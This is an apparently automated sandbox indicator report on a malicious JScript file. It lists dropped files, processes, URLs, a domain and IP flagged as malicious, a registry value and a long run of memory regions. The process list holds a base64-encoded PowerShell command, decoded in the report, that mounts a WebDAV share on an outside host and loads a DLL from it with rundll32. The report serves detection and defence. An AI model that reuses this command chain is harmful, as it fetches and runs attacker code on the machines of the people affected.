IOC Report
2251913620121805788.js

Files

File Path | Type | Category | Malicious
2251913620121805788.js | ASCII text, with very long lines (65536), with no line terminators | initial sample | malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wr300rc.tpj.psm1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qyr1crwa.xev.ps1 | ASCII text, with no line terminators | dropped |

Processes

Path | Cmdline | Malicious
C:\Windows\System32\wscript.exe | C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2251913620121805788.js" | malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAzADEAMQA3ADAAMQAzADUANwA1ADEAMgA1ADUALgBkAGwAbAAsAEUAbgB0AHIAeQA= | malicious
C:\Windows\System32\rundll32.exe | "C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\31170135751255.dll,Entry | malicious
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
C:\Windows\System32\net.exe | "C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\ |

Note: the -EncodedCommand argument above is UTF-16LE base64 and decodes to: net use \\apitestlabs.com@8888\davwwwroot\ ; rundll32 \\apitestlabs.com@8888\davwwwroot\31170135751255.dll,Entry. This matches the net.exe and rundll32.exe child processes listed, i.e. the WebDAV share is mounted and the DLL is loaded directly from it.

URLs

Name | IP | Malicious
http://apitestlabs.com:8888/ | unknown |
https://aka.ms/pscore68 | unknown |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown |
http://apitestlabs.com:8888/d | unknown |
http://apitestlabs.com:8888/em | unknown |

Domains

Name | IP | Malicious
apitestlabs.com | 94.159.113.48 | malicious
198.187.3.20.in-addr.arpa | unknown | malicious

IPs

IP | Domain | Country | Malicious
94.159.113.48 | apitestlabs.com | Russian Federation | malicious

Registry

Path | Value | Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe | JScriptSetScriptStateStarted |

Memdumps

Base Address | Regiontype | Protect | Malicious
AA09EFE000 | stack | page read and write |
1FD696A6000 | heap | page read and write |
1FD69699000 | heap | page read and write |
680357E000 | stack | page read and write |
1D0E1D44000 | heap | page read and write |
1FD514D1000 | trusted library allocation | page read and write |
19123248000 | heap | page read and write |
23CB7650000 | remote allocation | page read and write |
9F7A71F000 | stack | page read and write |
1912322D000 | heap | page read and write |
19123493000 | heap | page read and write |
1D0E1AC0000 | heap | page read and write |
1FD518B6000 | trusted library allocation | page read and write |
1D0E1ADF000 | heap | page read and write |
1FD50FC0000 | trusted library allocation | page read and write |
1FD515EF000 | trusted library allocation | page read and write |
23CB7650000 | remote allocation | page read and write |
1FD4F599000 | heap | page read and write |
1FD51470000 | heap | page execute and read and write |
7FFB4AA02000 | trusted library allocation | page read and write |
DDDEFE000 | stack | page read and write |
DDE1FB000 | stack | page read and write |
191237B0000 | heap | page read and write |
1912340F000 | heap | page read and write |
19123223000 | heap | page read and write |
7FFB4ACD0000 | trusted library allocation | page read and write |
1912340F000 | heap | page read and write |
1D0E1B00000 | heap | page read and write |
1D0E1ADB000 | heap | page read and write |
19121421000 | heap | page read and write |
1FD515EC000 | trusted library allocation | page read and write |
1D0E1AEE000 | heap | page read and write |
19123417000 | heap | page read and write |
7FFB4AD00000 | trusted library allocation | page read and write |
68039FE000 | stack | page read and write |
1FD69633000 | heap | page read and write |
1FD514F3000 | trusted library allocation | page read and write |
1FD4F650000 | heap | page read and write |
19123226000 | heap | page read and write |
1912322B000 | heap | page read and write |
1FD5195A000 | trusted library allocation | page read and write |
1FD697C0000 | heap | page read and write |
1912143D000 | heap | page read and write |
19123231000 | heap | page read and write |
19123246000 | heap | page read and write |
1D0E1AE0000 | heap | page read and write |
1FD69611000 | heap | page read and write |
DDD6F4000 | stack | page read and write |
19121449000 | heap | page read and write |
191213AA000 | heap | page read and write |
1FD69720000 | heap | page execute and read and write |
7FFB4AC70000 | trusted library allocation | page read and write |
DDDBFF000 | stack | page read and write |
19121645000 | heap | page read and write |
1FD516E9000 | trusted library allocation | page read and write |
19121434000 | heap | page read and write |
1FD69990000 | heap | page read and write |
1D0E18E0000 | heap | page read and write |
1FD5197D000 | trusted library allocation | page read and write |
9F7A79D000 | stack | page read and write |
7FFB4AAB0000 | trusted library allocation | page read and write |
1FD614DF000 | trusted library allocation | page read and write |
19121640000 | heap | page read and write |
1FD515DB000 | trusted library allocation | page read and write |
7FFB4ABE2000 | trusted library allocation | page read and write |
19123421000 | heap | page read and write |
1FD6967D000 | heap | page read and write |
9F7AA7F000 | stack | page read and write |
7FFB4AC50000 | trusted library allocation | page read and write |
1912323F000 | heap | page read and write |
19123272000 | heap | page read and write |
19121421000 | heap | page read and write |
DDDCFF000 | stack | page read and write |
23CB759A000 | heap | page read and write |
23CB75A7000 | heap | page read and write |
6803BFB000 | stack | page read and write |
1912323D000 | heap | page read and write |
1D0E1A70000 | heap | page read and write |
1FD51010000 | heap | page read and write |
1FD6961D000 | heap | page read and write |
1FD51A08000 | trusted library allocation | page read and write |
6803877000 | stack | page read and write |
1D0E1D40000 | heap | page read and write |
1D0E1D4B000 | heap | page read and write |
191213AB000 | heap | page read and write |
1912322F000 | heap | page read and write |
23CB7575000 | heap | page read and write |
19123320000 | heap | page read and write |
1D0E1ADB000 | heap | page read and write |
1912324D000 | heap | page read and write |
1FD69726000 | heap | page execute and read and write |
23CB7594000 | heap | page read and write |
7FFB4ABD0000 | trusted library allocation | page execute and read and write |
1FD695E0000 | heap | page read and write |
7FFB4ABF0000 | trusted library allocation | page execute and read and write |
7FFB4AA03000 | trusted library allocation | page execute and read and write |
1912144A000 | heap | page read and write |
23CB7567000 | heap | page read and write |
19123225000 | heap | page read and write |
1912323B000 | heap | page read and write |
7FFB4ABC0000 | trusted library allocation | page execute and read and write |
19123223000 | heap | page read and write |
1FD515DE000 | trusted library allocation | page read and write |
7FFB4AB20000 | trusted library allocation | page execute and read and write |
1912337E000 | heap | page read and write |
1912341C000 | heap | page read and write |
23CB7650000 | remote allocation | page read and write |
1D0E1AB3000 | heap | page read and write |
23CB757A000 | heap | page read and write |
19123419000 | heap | page read and write |
23CB7573000 | heap | page read and write |
7FFB4ACF0000 | trusted library allocation | page read and write |
1FD4F5DA000 | heap | page read and write |
7FFB4AC40000 | trusted library allocation | page read and write |
19121380000 | heap | page read and write |
1D0E1AEC000 | heap | page read and write |
19123230000 | heap | page read and write |
7FFB4ACA0000 | trusted library allocation | page read and write |
19123321000 | heap | page read and write |
1FD4F570000 | heap | page read and write |
19123227000 | heap | page read and write |
68031CE000 | stack | page read and write |
23CB7594000 | heap | page read and write |
1FD4F591000 | heap | page read and write |
6803A7E000 | stack | page read and write |
1FD4F64C000 | heap | page read and write |
7FFB4AAE6000 | trusted library allocation | page execute and read and write |
7FFB4ABBA000 | trusted library allocation | page read and write |
1D0E5540000 | heap | page read and write |
19121455000 | heap | page read and write |
68037F8000 | stack | page read and write |
19123233000 | heap | page read and write |
1FD4F5B1000 | heap | page read and write |
23CB756B000 | heap | page read and write |
7FFB4AA10000 | trusted library allocation | page read and write |
7FFB4ABB1000 | trusted library allocation | page read and write |
19123242000 | heap | page read and write |
7FFB4AABC000 | trusted library allocation | page execute and read and write |
7FFB4ACE0000 | trusted library allocation | page read and write |
6803979000 | stack | page read and write |
7FFB4ACC0000 | trusted library allocation | page read and write |
7DF4AEC80000 | trusted library allocation | page execute and read and write |
7FFB4AAC0000 | trusted library allocation | page execute and read and write |
68038F8000 | stack | page read and write |
680318E000 | stack | page read and write |
1FD4F557000 | heap | page read and write |
1FD515E1000 | trusted library allocation | page read and write |
7FFB4AAB6000 | trusted library allocation | page read and write |
1D0E1AC8000 | heap | page read and write |
23CB7573000 | heap | page read and write |
1FD4F5DF000 | heap | page read and write |
1FD51015000 | heap | page read and write |
1FD61542000 | trusted library allocation | page read and write |
AA09FFB000 | stack | page read and write |
7FFB4AA0D000 | trusted library allocation | page execute and read and write |
23CB7550000 | heap | page read and write |
6803103000 | stack | page read and write |
DDDAFE000 | stack | page read and write |
23CB77B0000 | heap | page read and write |
1D0E1B08000 | heap | page read and write |
23CB7540000 | heap | page read and write |
191213B1000 | heap | page read and write |
7FFB4AC90000 | trusted library allocation | page read and write |
1D0E4D40000 | trusted library allocation | page read and write |
1912323C000 | heap | page read and write |
19121340000 | heap | page read and write |
AA09BFB000 | stack | page read and write |
1FD518B0000 | trusted library allocation | page read and write |
6803B7E000 | stack | page read and write |
191213C3000 | heap | page read and write |
19121310000 | heap | page read and write |
7FFB4AD20000 | trusted library allocation | page read and write |
19121455000 | heap | page read and write |
23CB77B4000 | heap | page read and write |
1912341B000 | heap | page read and write |
23CB7548000 | heap | page read and write |
19123256000 | heap | page read and write |
19123282000 | heap | page read and write |
1FD519D8000 | trusted library allocation | page read and write |
1D0E19E0000 | heap | page read and write |
1912144A000 | heap | page read and write |
7FFB4AD10000 | trusted library allocation | page read and write |
1D0E1AE4000 | heap | page read and write |
1912143E000 | heap | page read and write |
AA09E7E000 | stack | page read and write |
23CB757A000 | heap | page read and write |
DDD7FE000 | stack | page read and write |
1FD51560000 | trusted library allocation | page read and write |
19123242000 | heap | page read and write |
191213B1000 | heap | page read and write |
680377E000 | stack | page read and write |
1D0E1AF3000 | heap | page read and write |
1FD50FB0000 | heap | page readonly |
19121560000 | heap | page read and write |
1FD4F730000 | heap | page read and write |
1FD515F2000 | trusted library allocation | page read and write |
19121455000 | heap | page read and write |
DDDDFF000 | stack | page read and write |
1FD4F550000 | heap | page read and write |
68035FC000 | stack | page read and write |
1FD4F5D8000 | heap | page read and write |
1FD51630000 | trusted library allocation | page read and write |
19121437000 | heap | page read and write |
68034FE000 | stack | page read and write |
7FFB4AC60000 | trusted library allocation | page read and write |
7FFB4AC10000 | trusted library allocation | page read and write |
AA09F7D000 | stack | page read and write |
1D0E1AB0000 | heap | page read and write |
19121455000 | heap | page read and write |
1FD51410000 | heap | page execute and read and write |
1FD4F750000 | heap | page read and write |
1D0E1ACE000 | heap | page read and write |
19121455000 | heap | page read and write |
1912143A000 | heap | page read and write |
1912144A000 | heap | page read and write |
1D0E19C0000 | heap | page read and write |
23CB7500000 | heap | page read and write |
1FD51533000 | trusted library allocation | page read and write |
1912340F000 | heap | page read and write |
19123242000 | heap | page read and write |
23CB74E0000 | heap | page read and write |
19123420000 | heap | page read and write |
1FD614D1000 | trusted library allocation | page read and write |
19121441000 | heap | page read and write |
19121442000 | heap | page read and write |
19121455000 | heap | page read and write |
1FD51629000 | trusted library allocation | page read and write |
23CB759D000 | heap | page read and write |
68036FE000 | stack | page read and write |
1FD50F80000 | trusted library allocation | page read and write |
1FD50FA0000 | trusted library allocation | page read and write |
1FD515D8000 | trusted library allocation | page read and write |
1FD6961B000 | heap | page read and write |
1FD4F7A5000 | heap | page read and write |
1FD696AD000 | heap | page read and write |
23CB756B000 | heap | page read and write |
680347F000 | stack | page read and write |
1912322B000 | heap | page read and write |
19121320000 | heap | page read and write |
7FFB4AC20000 | trusted library allocation | page read and write |
68038FE000 | stack | page read and write |
1912322B000 | heap | page read and write |
19123220000 | heap | page read and write |
7FFB4AA04000 | trusted library allocation | page read and write |
1FD514EB000 | trusted library allocation | page read and write |
19123494000 | heap | page read and write |
1FD514C0000 | heap | page read and write |
19123241000 | heap | page read and write |
DDDFFD000 | stack | page read and write |
23CB7400000 | heap | page read and write |
1912324A000 | heap | page read and write |
7FFB4AC00000 | trusted library allocation | page read and write |
19123265000 | heap | page read and write |
7FFB4AC30000 | trusted library allocation | page read and write |
7FFB4ACB0000 | trusted library allocation | page read and write |
191213B0000 | heap | page read and write |
1FD515E4000 | trusted library allocation | page read and write |
1FD50F50000 | heap | page read and write |
23CB75A7000 | heap | page read and write |
DDD8FE000 | stack | page read and write |
7FFB4ABA0000 | trusted library allocation | page read and write |
7FFB4AC80000 | trusted library allocation | page read and write |
9F7A69A000 | stack | page read and write |
19123241000 | heap | page read and write |
191213AB000 | heap | page read and write |
19121455000 | heap | page read and write |
19123262000 | heap | page read and write |
19121439000 | heap | page read and write |
1FD4F7A0000 | heap | page read and write |
680367F000 | stack | page read and write |
260 further memdumps were hidden in the original report and are not listed here.